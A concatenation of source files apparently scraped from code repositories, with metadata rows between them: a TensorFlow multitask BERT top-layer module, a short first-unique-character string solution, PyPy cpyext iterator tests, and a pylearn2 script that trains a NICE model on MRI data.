] | 1 | 2021-07-11T14:07:59.000Z | 2021-07-11T14:07:59.000Z | bert_multitask_learning/top.py | akashnd/bert-multitask-learning | aee5be006ef6a3feadf0c751a6f9b42c24c3fd21 | [
"Apache-2.0"
] | null | null | null | bert_multitask_learning/top.py | akashnd/bert-multitask-learning | aee5be006ef6a3feadf0c751a6f9b42c24c3fd21 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: source_nbs/12_top.ipynb (unless otherwise specified).
__all__ = ['empty_tensor_handling_loss', 'nan_loss_handling', 'create_dummy_if_empty', 'BaseTop', 'SequenceLabel',
'Classification', 'PreTrain', 'Seq2Seq', 'MultiLabelClassification', 'MaskLM']
# Cell
import logging
from functools import partial
from typing import Dict, Tuple, Union
import tensorflow as tf
import tensorflow_addons as tfa
import transformers
from transformers.modeling_tf_utils import TFSharedEmbeddings
from tensorflow_addons.layers.crf import CRF
from tensorflow_addons.text.crf import crf_log_likelihood
from .params import BaseParams
from .utils import gather_indexes
@tf.function
def empty_tensor_handling_loss(labels, logits, loss_fn):
    """Compute ``mean(loss_fn(labels, logits))``, but return 0.0 for degenerate labels.

    Guards against three degenerate cases before evaluating the loss:
    an empty ``labels`` tensor, a scalar (rank-0) ``labels`` tensor, and a
    zero-sized batch dimension.  Presumably these arise when a batch contains
    no examples for this particular problem in multi-problem training —
    TODO confirm against the input pipeline.

    Args:
        labels: ground-truth label tensor (may be empty).
        logits: model output logits matching ``labels``.
        loss_fn: a Keras-style loss callable accepting
            ``(labels, logits, from_logits=True)``.

    Returns:
        A scalar loss tensor, or 0.0 when ``labels`` is degenerate.
    """
    # NOTE: each `if` below is converted by AutoGraph into a tf.cond,
    # so the checks run on dynamic (runtime) tensor values.
    if tf.equal(tf.size(labels), 0):
        return 0.0
    if tf.equal(tf.size(tf.shape(labels)), 0):
        # rank-0 tensor: tf.shape(labels)[0] below would be invalid
        return 0.0
    if tf.equal(tf.shape(labels)[0], 0):
        return 0.0
    else:
        return tf.reduce_mean(loss_fn(
            labels, logits, from_logits=True))
@tf.function
def nan_loss_handling(loss):
    """Return ``loss`` unchanged, substituting 0.0 when it is NaN.

    Prevents a NaN from a single loss term from propagating into any
    sum it is later added to.
    """
    if tf.math.is_nan(loss):
        return 0.0
    return loss
@tf.function
def create_dummy_if_empty(inp_tensor: tf.Tensor) -> tf.Tensor:
    """Return ``inp_tensor``, or an all-zero stand-in when its batch is empty.

    The stand-in has batch size 1, preserves every trailing dimension and
    the original dtype, so downstream ops that cannot cope with a
    zero-sized leading dimension still receive a well-formed tensor.
    """
    dyn_shape = tf.shape(inp_tensor)
    if tf.equal(dyn_shape[0], 0):
        # replace the empty leading dim with 1, keep the rest of the shape
        batch_of_one = tf.convert_to_tensor([1], dtype=tf.int32)
        dummy_shape = tf.concat([batch_of_one, dyn_shape[1:]], axis=0)
        return tf.zeros(dummy_shape, dtype=inp_tensor.dtype)
    else:
        return inp_tensor
class BaseTop(tf.keras.Model):
    """Abstract base class for problem-specific top layers.

    Stores the shared ``params`` object and the problem name (also used as
    the Keras layer name).  Subclasses implement ``call``.
    """

    def __init__(self, params: BaseParams, problem_name: str) -> None:
        super(BaseTop, self).__init__(name=problem_name)
        self.params = params
        self.problem_name = problem_name

    def call(self, inputs: Tuple[Dict], mode: str):
        """Forward pass; ``inputs`` is ``(features, hidden_features)`` and
        ``mode`` is a ``tf.estimator.ModeKeys`` value.  Must be overridden."""
        raise NotImplementedError
# Cell
class SequenceLabel(tf.keras.Model):
    """Token-level classification (sequence labeling) top layer.

    Projects per-token hidden states to ``num_classes`` logits for the given
    problem.  When ``params.crf`` is enabled, decoding and the loss go
    through a CRF (negative log-likelihood); otherwise a plain softmax
    cross-entropy is used.
    """

    def __init__(self, params: BaseParams, problem_name: str):
        super(SequenceLabel, self).__init__(name=problem_name)
        self.params = params
        self.problem_name = problem_name
        num_classes = self.params.num_classes[self.problem_name]
        self.dense = tf.keras.layers.Dense(num_classes, activation=None)
        self.dropout = tf.keras.layers.Dropout(1-params.dropout_keep_prob)
        if self.params.crf:
            # CRF decoding yields dense label ids, so plain Accuracy applies;
            # the softmax path below compares ids against logits instead.
            self.crf = CRF(num_classes)
            self.metric_fn = tf.keras.metrics.Accuracy(
                name='{}_acc'.format(self.problem_name)
            )
        else:
            self.metric_fn = tf.keras.metrics.SparseCategoricalAccuracy(
                name='{}_acc'.format(self.problem_name))

    def return_crf_result(self, labels: tf.Tensor, logits: tf.Tensor, mode: str, input_mask: tf.Tensor):
        """Decode with the CRF and, outside predict mode, record loss and accuracy.

        Returns one-hot predictions so the output shape matches the
        softmax (non-CRF) branch of ``call``.
        """
        input_mask.set_shape([None, None])
        # substitute batch-size-1 dummies so the CRF never sees an empty batch
        logits = create_dummy_if_empty(logits)
        input_mask = create_dummy_if_empty(input_mask)
        viterbi_decoded, potentials, sequence_length, chain_kernel = self.crf(
            logits, input_mask)
        if mode != tf.estimator.ModeKeys.PREDICT:
            # loss is the negative CRF log-likelihood, averaged over the batch
            loss = -crf_log_likelihood(potentials,
                                       labels, sequence_length, chain_kernel)[0]
            loss = tf.reduce_mean(loss)
            loss = nan_loss_handling(loss)
            self.add_loss(loss)
            acc = self.metric_fn(
                labels, viterbi_decoded, sample_weight=input_mask)
            self.add_metric(acc)
        # make the crf prediction has the same shape as non-crf prediction
        return tf.one_hot(viterbi_decoded, name='%s_predict' % self.problem_name, depth=self.params.num_classes[self.problem_name])

    def call(self, inputs, mode):
        """Forward pass.

        Args:
            inputs: ``(features, hidden_features)``; uses the per-token
                ``hidden_features['seq']`` states.
            mode: a ``tf.estimator.ModeKeys`` value.

        Returns:
            ``[batch, seq_len, num_classes]`` probabilities (softmax) or
            one-hot CRF decodes.
        """
        training = (mode == tf.estimator.ModeKeys.TRAIN)
        feature, hidden_feature = inputs
        hidden_feature = hidden_feature['seq']
        if mode != tf.estimator.ModeKeys.PREDICT:
            labels = feature['{}_label_ids'.format(self.problem_name)]
            # sometimes the length of labels does not equal to length of inputs
            # that's caused by tf.data.experimental.bucket_by_sequence_length in multi problem scenario
            pad_len = tf.shape(input=hidden_feature)[
                1] - tf.shape(input=labels)[1]
            # top, bottom, left, right
            pad_tensor = [[0, 0], [0, pad_len]]
            labels = tf.pad(tensor=labels, paddings=pad_tensor)
        else:
            labels = None
        hidden_feature = self.dropout(hidden_feature, training)
        if self.params.crf:
            return self.return_crf_result(labels, hidden_feature, mode, feature['model_input_mask'])
        logits = self.dense(hidden_feature)
        if mode != tf.estimator.ModeKeys.PREDICT:
            loss = empty_tensor_handling_loss(
                labels, logits,
                tf.keras.losses.sparse_categorical_crossentropy)
            self.add_loss(loss)
            # padding tokens are excluded from accuracy via the input mask
            acc = self.metric_fn(
                labels, logits, sample_weight=feature['model_input_mask'])
            self.add_metric(acc)
        return tf.nn.softmax(
            logits, name='%s_predict' % self.problem_name)
# Cell
class Classification(tf.keras.layers.Layer):
    """Single-label sentence classification top layer.

    Applies dropout and a dense projection to the pooled transformer output
    and, outside predict mode, records a label-smoothed cross-entropy loss
    and a sparse-categorical accuracy metric.
    """

    def __init__(self, params: BaseParams, problem_name: str) -> None:
        super(Classification, self).__init__(name=problem_name)
        self.params = params
        self.problem_name = problem_name
        n_cls = self.params.num_classes[problem_name]
        self.dense = tf.keras.layers.Dense(n_cls, activation=None)
        self.metric_fn = tf.keras.metrics.SparseCategoricalAccuracy(
            name='{}_acc'.format(problem_name))
        self.dropout = tf.keras.layers.Dropout(1 - params.dropout_keep_prob)

    def call(self, inputs, mode):
        """Return ``[batch, num_classes]`` softmax probabilities.

        ``inputs`` is ``(features, hidden_features)``; only the pooled
        representation is consumed.
        """
        is_training = (mode == tf.estimator.ModeKeys.TRAIN)
        is_predict = (mode == tf.estimator.ModeKeys.PREDICT)
        feature, hidden_feature = inputs
        pooled_output = hidden_feature['pooled']

        labels = None
        if not is_predict:
            labels = feature['{}_label_ids'.format(self.problem_name)]

        pooled_output = self.dropout(pooled_output, is_training)
        logits = self.dense(pooled_output)

        if not is_predict:
            # label smoothing requires dense (one-hot) targets
            one_hot_labels = tf.one_hot(
                labels, depth=self.params.num_classes[self.problem_name])
            smoothed_xent = partial(
                tf.keras.losses.categorical_crossentropy,
                from_logits=True,
                label_smoothing=self.params.label_smoothing)
            loss = empty_tensor_handling_loss(
                one_hot_labels, logits, smoothed_xent)
            self.add_loss(nan_loss_handling(loss))
            self.add_metric(self.metric_fn(labels, logits))

        return tf.nn.softmax(
            logits, name='%s_predict' % self.problem_name)
# Cell
class PreTrain(tf.keras.Model):
    """BERT pre-training top layer: next-sentence prediction (NSP) + masked LM.

    Optionally ties the MLM output projection to the encoder's word-embedding
    matrix (weight sharing); otherwise uses an independent dense layer over
    the vocabulary.
    """

    def __init__(self, params: BaseParams, problem_name: str, input_embeddings: tf.Tensor = None, share_embedding=True):
        """
        Args:
            params: global config; provides ``bert_config`` and the
                ``share_embedding`` flag.
            problem_name: name of this problem (used as the layer name).
            input_embeddings: the encoder's embedding layer; its
                ``word_embeddings`` weight is reused when sharing is enabled.
            share_embedding: set False to force an untied output projection.
        """
        super(PreTrain, self).__init__(name=problem_name)
        self.params = params
        self.nsp = transformers.models.bert.modeling_tf_bert.TFBertNSPHead(
            self.params.bert_config)
        if share_embedding is False:
            self.vocab_size = self.params.bert_config.vocab_size
            self.share_embedding = False
        else:
            word_embedding_weight = input_embeddings.word_embeddings
            self.vocab_size = word_embedding_weight.shape[0]
            embedding_size = word_embedding_weight.shape[-1]
            # sharing is only possible when hidden size equals embedding size
            share_valid = (self.params.bert_config.hidden_size ==
                           embedding_size)
            if not share_valid and self.params.share_embedding:
                logging.warning(
                    'Share embedding is enabled but hidden_size != embedding_size')
            self.share_embedding = self.params.share_embedding & share_valid
        if self.share_embedding:
            # wrap the encoder's embedding matrix so it can be applied
            # in 'linear' (transposed) mode as the MLM output projection
            self.share_embedding_layer = TFSharedEmbeddings(
                vocab_size=word_embedding_weight.shape[0], hidden_size=word_embedding_weight.shape[1])
            self.share_embedding_layer.build([1])
            self.share_embedding_layer.weight = word_embedding_weight
        else:
            self.share_embedding_layer = tf.keras.layers.Dense(self.vocab_size)

    def call(self,
             inputs: Tuple[Dict[str, Dict[str, tf.Tensor]], Dict[str, Dict[str, tf.Tensor]]],
             mode: str) -> Tuple[tf.Tensor, tf.Tensor]:
        """Compute NSP and MLM predictions; add their summed loss when training.

        Args:
            inputs: ``(features, hidden_features)``.  Outside predict mode,
                ``features`` must contain ``masked_lm_positions``,
                ``masked_lm_ids`` and ``next_sentence_label_ids``.
            mode: a ``tf.estimator.ModeKeys`` value.

        Returns:
            ``(sigmoid(nsp_logits), softmax(mlm_logits))``.
        """
        features, hidden_features = inputs
        # compute logits
        nsp_logits = self.nsp(hidden_features['pooled'])
        # masking is done inside the model
        seq_hidden_feature = hidden_features['seq']
        if mode != tf.estimator.ModeKeys.PREDICT:
            positions = features['masked_lm_positions']
            # gather_indexes will flatten the seq hidden_states, we need to reshape
            # back to 3d tensor
            input_tensor = gather_indexes(seq_hidden_feature, positions)
            shape_tensor = tf.shape(positions)
            shape_list = tf.concat(
                [shape_tensor, [seq_hidden_feature.shape.as_list()[-1]]], axis=0)
            input_tensor = tf.reshape(input_tensor, shape=shape_list)
            # set_shape to determine rank
            input_tensor.set_shape(
                [None, None, seq_hidden_feature.shape.as_list()[-1]])
        else:
            # at predict time score every position, not just the masked ones
            input_tensor = seq_hidden_feature
        if self.share_embedding:
            mlm_logits = self.share_embedding_layer(
                input_tensor, mode='linear')
        else:
            mlm_logits = self.share_embedding_layer(input_tensor)
        if mode != tf.estimator.ModeKeys.PREDICT:
            nsp_labels = features['next_sentence_label_ids']
            mlm_labels = features['masked_lm_ids']
            mlm_labels.set_shape([None, None])
            # compute loss
            nsp_loss = empty_tensor_handling_loss(
                nsp_labels, nsp_logits,
                tf.keras.losses.sparse_categorical_crossentropy)
            mlm_loss_layer = transformers.modeling_tf_utils.TFMaskedLanguageModelingLoss()
            # mlm_loss = tf.reduce_mean(
            #     mlm_loss_layer.compute_loss(mlm_labels, mlm_logits))
            # add a useless from_logits argument to match the function signature of keras losses.

            def loss_fn_wrapper(labels, logits, from_logits=True):
                return mlm_loss_layer.compute_loss(labels, logits)
            mlm_loss = empty_tensor_handling_loss(
                mlm_labels,
                mlm_logits,
                loss_fn_wrapper
            )
            loss = nsp_loss + mlm_loss
            self.add_loss(loss)
        return (tf.sigmoid(nsp_logits), tf.nn.softmax(mlm_logits))
# Cell
class Seq2Seq(tf.keras.Model):
    """Sequence-to-sequence top layer (currently disabled).

    ``__init__`` unconditionally raises :class:`NotImplementedError`; the
    previous BART-decoder-based implementation is kept below as commented-out
    code for reference.

    NOTE(review): ``call`` and ``_seq2seq_label_shift_right`` reference
    ``self.decoder`` and ``self.metric_fn``, which are never assigned while
    ``__init__`` raises — they are unreachable until the class is re-enabled.
    """

    def __init__(self, params: BaseParams, problem_name: str, input_embeddings: tf.keras.layers.Layer):
        super(Seq2Seq, self).__init__(name=problem_name)
        # self.params = params
        # self.problem_name = problem_name
        # # if self.params.init_weight_from_huggingface:
        # #     self.decoder = load_transformer_model(
        # #         self.params.transformer_decoder_model_name,
        # #         self.params.transformer_decoder_model_loading)
        # # else:
        # #     self.decoder = load_transformer_model(
        # #         self.params.bert_decoder_config, self.params.transformer_decoder_model_loading)

        # # TODO: better implementation
        # logging.warning(
        #     'Seq2Seq model is not well supported yet. Bugs are expected.')
        # config = self.params.bert_decoder_config
        # # some hacky approach to share embeddings from encoder to decoder
        # word_embedding_weight = input_embeddings.word_embeddings
        # self.vocab_size = word_embedding_weight.shape[0]
        # self.share_embedding_layer = TFSharedEmbeddings(
        #     vocab_size=word_embedding_weight.shape[0], hidden_size=word_embedding_weight.shape[1])
        # self.share_embedding_layer.build([1])
        # self.share_embedding_layer.weight = word_embedding_weight
        # # self.decoder = TFBartDecoder(
        # #     config=config, embed_tokens=self.share_embedding_layer)
        # self.decoder = TFBartDecoderForConditionalGeneration(
        #     config=config, embedding_layer=self.share_embedding_layer)
        # self.decoder.set_bos_id(self.params.bos_id)
        # self.decoder.set_eos_id(self.params.eos_id)
        # self.metric_fn = tf.keras.metrics.SparseCategoricalAccuracy(
        #     name='{}_acc'.format(self.problem_name))
        raise NotImplementedError

    def _seq2seq_label_shift_right(self, labels: tf.Tensor, eos_id: int) -> tf.Tensor:
        """Shift ``labels`` one position left and append ``eos_id`` to each row,
        producing decoder targets aligned with next-token predictions."""
        batch_eos_ids = tf.fill([tf.shape(labels)[0], 1], eos_id)
        batch_eos_ids = tf.cast(batch_eos_ids, dtype=tf.int64)
        decoder_lable = labels[:, 1:]
        decoder_lable = tf.concat([decoder_lable, batch_eos_ids], axis=1)
        return decoder_lable

    def call(self,
             inputs: Tuple[Dict[str, Dict[str, tf.Tensor]], Dict[str, Dict[str, tf.Tensor]]],
             mode: str):
        """Decode against the encoder states; generate at predict time,
        otherwise teacher-force and record loss/accuracy."""
        features, hidden_features = inputs
        encoder_mask = features['model_input_mask']
        if mode == tf.estimator.ModeKeys.PREDICT:
            input_ids = None
            decoder_padding_mask = None
        else:
            input_ids = features['%s_label_ids' % self.problem_name]
            decoder_padding_mask = features['{}_mask'.format(
                self.problem_name)]

        if mode == tf.estimator.ModeKeys.PREDICT:
            return self.decoder.generate(eos_token_id=self.params.eos_id, encoder_hidden_states=hidden_features['seq'])
        else:
            decoder_output = self.decoder(input_ids=input_ids,
                                          encoder_hidden_states=hidden_features['seq'],
                                          encoder_padding_mask=encoder_mask,
                                          decoder_padding_mask=decoder_padding_mask,
                                          decode_max_length=self.params.decode_max_seq_len,
                                          mode=mode)
            loss = decoder_output.loss
            logits = decoder_output.logits
            self.add_loss(loss)
            decoder_label = self._seq2seq_label_shift_right(
                features['%s_label_ids' % self.problem_name], eos_id=self.params.eos_id)
            acc = self.metric_fn(decoder_label, logits)
            self.add_metric(acc)
            return logits
# Cell
class MultiLabelClassification(tf.keras.Model):
    """Multi-label classification top layer.

    Projects the pooled transformer output to one logit per class and,
    outside predict mode, records a positive-weighted sigmoid cross-entropy
    loss.  Returns independent per-class sigmoid probabilities.
    """

    def __init__(self, params: BaseParams, problem_name: str) -> None:
        super(MultiLabelClassification, self).__init__(name=problem_name)
        self.params = params
        self.problem_name = problem_name
        self.dense = tf.keras.layers.Dense(
            self.params.num_classes[problem_name])
        self.dropout = tf.keras.layers.Dropout(
            1 - self.params.dropout_keep_prob)

    def call(self, inputs, mode):
        """Return ``[batch, num_classes]`` sigmoid probabilities."""
        is_training = (mode == tf.estimator.ModeKeys.TRAIN)
        is_predict = (mode == tf.estimator.ModeKeys.PREDICT)
        feature, hidden_feature = inputs
        pooled = hidden_feature['pooled']

        labels = None
        if not is_predict:
            labels = feature['{}_label_ids'.format(self.problem_name)]

        pooled = self.dropout(pooled, is_training)
        logits = self.dense(pooled)

        if not is_predict:
            float_labels = tf.cast(labels, tf.float32)
            # weight the positive class to counter label sparsity
            pos_weight = self.params.multi_cls_positive_weight

            def _weighted_sigmoid_xent(y_true, y_pred, from_logits=True):
                return tf.nn.weighted_cross_entropy_with_logits(
                    y_true, y_pred, pos_weight=pos_weight,
                    name='{}_loss'.format(self.problem_name))

            loss = empty_tensor_handling_loss(
                float_labels, logits, _weighted_sigmoid_xent)
            self.add_loss(nan_loss_handling(loss))

        return tf.nn.sigmoid(
            logits, name='%s_predict' % self.problem_name)
# Cell
class MaskLM(tf.keras.Model):
    """Multimodal MLM top layer.

    Projects sequence hidden states onto the vocabulary, optionally sharing
    weights with the encoder's input word embeddings, and (outside of
    prediction mode) registers a sparse categorical cross-entropy loss over
    the masked positions.
    """
    def __init__(self, params: BaseParams, problem_name: str, input_embeddings: tf.keras.layers.Layer=None, share_embedding=True) -> None:
        super(MaskLM, self).__init__(name=problem_name)
        self.params = params
        self.problem_name = problem_name
        if share_embedding is False:
            # Independent output projection; vocab size comes from the config.
            self.vocab_size = self.params.bert_config.vocab_size
            self.share_embedding = False
        else:
            word_embedding_weight = input_embeddings.word_embeddings
            self.vocab_size = word_embedding_weight.shape[0]
            embedding_size = word_embedding_weight.shape[-1]
            # Weight sharing only works when the encoder hidden size matches
            # the embedding size.
            share_valid = (self.params.bert_config.hidden_size ==
                           embedding_size)
            if not share_valid and self.params.share_embedding:
                logging.warning(
                    'Share embedding is enabled but hidden_size != embedding_size')
            # Bitwise '&' on two bools acts as a logical AND here.
            self.share_embedding = self.params.share_embedding & share_valid
        if self.share_embedding:
            self.share_embedding_layer = TFSharedEmbeddings(
                vocab_size=self.vocab_size, hidden_size=word_embedding_weight.shape[1])
            # Build with a dummy shape, then overwrite the kernel so the layer
            # reuses the encoder's word-embedding matrix.
            self.share_embedding_layer.build([1])
            self.share_embedding_layer.weight = word_embedding_weight
        else:
            self.share_embedding_layer = tf.keras.layers.Dense(self.vocab_size)
    def call(self, inputs, mode):
        features, hidden_features = inputs
        # masking is done inside the model
        seq_hidden_feature = hidden_features['seq']
        if mode != tf.estimator.ModeKeys.PREDICT:
            positions = features['masked_lm_positions']
            # gather_indexes will flatten the seq hidden_states, we need to reshape
            # back to 3d tensor
            input_tensor = gather_indexes(seq_hidden_feature, positions)
            shape_tensor = tf.shape(positions)
            shape_list = tf.concat([shape_tensor, [seq_hidden_feature.shape.as_list()[-1]]], axis=0)
            input_tensor = tf.reshape(input_tensor, shape=shape_list)
            # set_shape to determine the static rank: (batch, num_masked, hidden)
            input_tensor.set_shape(
                [None, None, seq_hidden_feature.shape.as_list()[-1]])
        else:
            # Prediction mode scores every sequence position, not just masks.
            input_tensor = seq_hidden_feature
        if self.share_embedding:
            # 'linear' mode projects hidden states onto the vocabulary.
            mlm_logits = self.share_embedding_layer(
                input_tensor, mode='linear')
        else:
            mlm_logits = self.share_embedding_layer(input_tensor)
        if mode != tf.estimator.ModeKeys.PREDICT:
            mlm_labels = features['masked_lm_ids']
            mlm_labels.set_shape([None, None])
            # compute loss
            # NOTE(review): mlm_logits are raw logits; confirm that
            # empty_tensor_handling_loss passes from_logits=True to this loss.
            mlm_loss = empty_tensor_handling_loss(
                mlm_labels,
                mlm_logits,
                tf.keras.losses.sparse_categorical_crossentropy
            )
            # Guard against NaNs from empty/degenerate batches.
            loss = nan_loss_handling(mlm_loss)
            self.add_loss(loss)
        return tf.nn.softmax(mlm_logits)
| 42.095137 | 138 | 0.638491 | 2,370 | 19,911 | 5.072996 | 0.117722 | 0.043916 | 0.03119 | 0.032521 | 0.650836 | 0.619313 | 0.570906 | 0.543625 | 0.513932 | 0.494968 | 0 | 0.004749 | 0.270303 | 19,911 | 472 | 139 | 42.184322 | 0.822768 | 0.135553 | 0 | 0.574018 | 1 | 0 | 0.033567 | 0.005487 | 0 | 0 | 0 | 0.002119 | 0 | 1 | 0.063444 | false | 0 | 0.033233 | 0.006042 | 0.178248 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3cc0271bb0d934fe7034974b1385e41735a694e | 447 | py | Python | strings/#387/strings.py | sharmarkei/DSA-Practice | c98e9f5ae1824d86f02d1002d908dc24c8be8812 | [
"MIT"
] | null | null | null | strings/#387/strings.py | sharmarkei/DSA-Practice | c98e9f5ae1824d86f02d1002d908dc24c8be8812 | [
"MIT"
] | null | null | null | strings/#387/strings.py | sharmarkei/DSA-Practice | c98e9f5ae1824d86f02d1002d908dc24c8be8812 | [
"MIT"
] | null | null | null | class Solution(object):
def firstUniqChar(self, s):
"""
:type s: str
:rtype: int
"""
dict_1 = {}
for i in s:
if i not in dict_1:
dict_1[i] = 1
else:
dict_1[i] += 1
print(dict_1)
for idx, val in enumerate(s):
if dict_1[val] == 1:
return idx
return -1
| 20.318182 | 37 | 0.364653 | 51 | 447 | 3.078431 | 0.470588 | 0.191083 | 0.101911 | 0.089172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04878 | 0.541387 | 447 | 22 | 38 | 20.318182 | 0.717073 | 0.053691 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0 | 0 | 0.307692 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3d01a6d5b6d4e91e1847f49e77097d90f67ce9c | 906 | py | Python | pypy/module/cpyext/test/test_iterator.py | wdv4758h/mu-client-pypy | d2fcc01f0b4fe3ffa232762124e3e6d38ed3a0cf | [
"Apache-2.0",
"OpenSSL"
] | 34 | 2015-07-09T04:53:27.000Z | 2021-07-19T05:22:27.000Z | pypy/module/cpyext/test/test_iterator.py | wdv4758h/mu-client-pypy | d2fcc01f0b4fe3ffa232762124e3e6d38ed3a0cf | [
"Apache-2.0",
"OpenSSL"
] | 6 | 2015-05-30T17:20:45.000Z | 2017-06-12T14:29:23.000Z | pypy/module/cpyext/test/test_iterator.py | wdv4758h/mu-client-pypy | d2fcc01f0b4fe3ffa232762124e3e6d38ed3a0cf | [
"Apache-2.0",
"OpenSSL"
] | 11 | 2015-09-07T14:26:08.000Z | 2020-04-10T07:20:41.000Z | from pypy.module.cpyext.test.test_api import BaseApiTest
class TestIterator(BaseApiTest):
    """Exercise the cpyext wrappers for the iterator protocol."""

    def test_check_iter(self, space, api):
        # Real iterators pass PyIter_Check ...
        str_iter = space.iter(space.wrap("a"))
        list_iter = space.iter(space.newlist([]))
        assert api.PyIter_Check(str_iter)
        assert api.PyIter_Check(list_iter)
        # ... while non-iterator objects do not.
        assert not api.PyIter_Check(space.w_type)
        assert not api.PyIter_Check(space.wrap(2))

    def test_getIter(self, space, api):
        w_iter = api.PyObject_GetIter(space.wrap([1, 2, 3]))
        for expected in (1, 2, 3):
            assert space.unwrap(api.PyIter_Next(w_iter)) == expected
        # An exhausted iterator returns NULL without raising.
        assert api.PyIter_Next(w_iter) is None
        assert not api.PyErr_Occurred()

    def test_iternext_error(self, space, api):
        # Calling PyIter_Next on a non-iterator sets TypeError.
        assert api.PyIter_Next(space.w_None) is None
        assert api.PyErr_Occurred() is space.w_TypeError
        api.PyErr_Clear()
| 39.391304 | 62 | 0.684327 | 135 | 906 | 4.392593 | 0.281481 | 0.136594 | 0.109612 | 0.128162 | 0.482293 | 0.451939 | 0.291737 | 0.177066 | 0 | 0 | 0 | 0.009642 | 0.198676 | 906 | 22 | 63 | 41.181818 | 0.807163 | 0 | 0 | 0 | 0 | 0 | 0.001104 | 0 | 0 | 0 | 0 | 0 | 0.611111 | 1 | 0.166667 | false | 0 | 0.055556 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3d41214e53cc3ba9f42c3c82841438366d8ce1d | 2,812 | py | Python | pylearn2/neuroimaging_utils/tutorials/nice/jobman/simple_train.py | rdevon/pylearn2 | f7b9a6ea0e2498176b47202f5bb83aec4976e1dd | [
"BSD-3-Clause"
] | 1 | 2017-10-29T06:18:35.000Z | 2017-10-29T06:18:35.000Z | pylearn2/neuroimaging_utils/tutorials/nice/jobman/simple_train.py | rdevon/pylearn2 | f7b9a6ea0e2498176b47202f5bb83aec4976e1dd | [
"BSD-3-Clause"
] | null | null | null | pylearn2/neuroimaging_utils/tutorials/nice/jobman/simple_train.py | rdevon/pylearn2 | f7b9a6ea0e2498176b47202f5bb83aec4976e1dd | [
"BSD-3-Clause"
] | null | null | null | """
Module to train a simple MLP for demo.
"""
from jobman.tools import expand
from jobman.tools import flatten
import logging
import nice_experiment
import numpy as np
from os import path
from pylearn2.config import yaml_parse
from pylearn2.neuroimaging_utils.datasets import MRI
from pylearn2.neuroimaging_utils.dataset_utils import mri_nifti
from pylearn2.scripts.jobman.experiment import ydict
from pylearn2.utils import serial
# Module-level logging configuration and the experiment's YAML template path.
logging.basicConfig(format="[%(module)s:%(levelname)s]:%(message)s")
logger = logging.getLogger(__name__)
# Path to the experiment YAML template, resolved by nice_experiment.
yaml_file = nice_experiment.yaml_file
def main(args):
    """Train a NICE model from parsed command-line arguments.

    The original signature took ``dataset_name="smri"`` but the body read
    the module-global ``args`` instead, and the only caller invokes
    ``main(args)`` — binding the argparse Namespace to ``dataset_name``.
    The signature now names what is actually passed and used; the existing
    positional call site is unaffected.

    Parameters
    ----------
    args : argparse.Namespace
        Output of ``nice_experiment.make_argument_parser().parse_args()``;
        must provide ``dataset_name``, ``l1_decay`` and any hyperparameter
        overrides matching the experiment's hyperparameter names.
    """
    logger.info("Getting dataset info for %s" % args.dataset_name)
    data_path = serial.preprocess("${PYLEARN2_NI_PATH}/" + args.dataset_name)
    mask_file = path.join(data_path, "mask.npy")
    mask = np.load(mask_file)
    input_dim = (mask == 1).sum()
    # NICE requires an even input dimensionality; drop one unit if odd.
    if input_dim % 2 == 1:
        input_dim -= 1
    mri = MRI.MRI_Standard(which_set="full",
                           dataset_name=args.dataset_name,
                           unit_normalize=True,
                           even_input=True,
                           apply_mask=True)
    variance_map_file = path.join(data_path, "variance_map.npy")
    mri_nifti.save_variance_map(mri, variance_map_file)

    user = path.expandvars("$USER")
    save_path = serial.preprocess("/export/mialab/users/%s/pylearn2_outs/%s"
                                  % (user, "nice_jobman_test"))
    file_params = {"save_path": save_path,
                   "variance_map_file": variance_map_file
                   }
    # Close the template file promptly instead of leaking the handle.
    with open(yaml_file) as f:
        yaml_template = f.read()
    hyperparams = expand(flatten(nice_experiment.default_hyperparams(input_dim=input_dim)),
                         dict_type=ydict)

    # Override default hyperparameters with any values supplied on the CLI.
    for param in hyperparams:
        if hasattr(args, param) and getattr(args, param):
            val = getattr(args, param)
            logger.info("Filling %s with %r" % (param, val))
            hyperparams[param] = type(hyperparams[param])(val)
        elif param == "weight_decay":
            # weight_decay is special-cased: an empty string disables it,
            # otherwise build an L1WeightDecay cost spec for the YAML.
            val = getattr(args, "l1_decay")
            if val == 0.0:
                hyperparams["weight_decay"] = ""
            else:
                hyperparams["weight_decay"] = {
                    "__builder__": "pylearn2.costs.mlp.L1WeightDecay",
                    "coeffs": {"z": val}
                }
    # Substitute file-path placeholders, then the hyperparameters.
    for param in file_params:
        yaml_template = yaml_template.replace("%%(%s)s" % param, file_params[param])
    yaml = yaml_template % hyperparams
    print(yaml)

    logger.info("Training")
    train = yaml_parse.load(yaml)
    train.main_loop()
if __name__ == "__main__":
    # Parse CLI arguments and configure verbosity before running training.
    parser = nice_experiment.make_argument_parser()
    args = parser.parse_args()
    if args.verbose:
        logger.setLevel(logging.DEBUG)
    main(args)
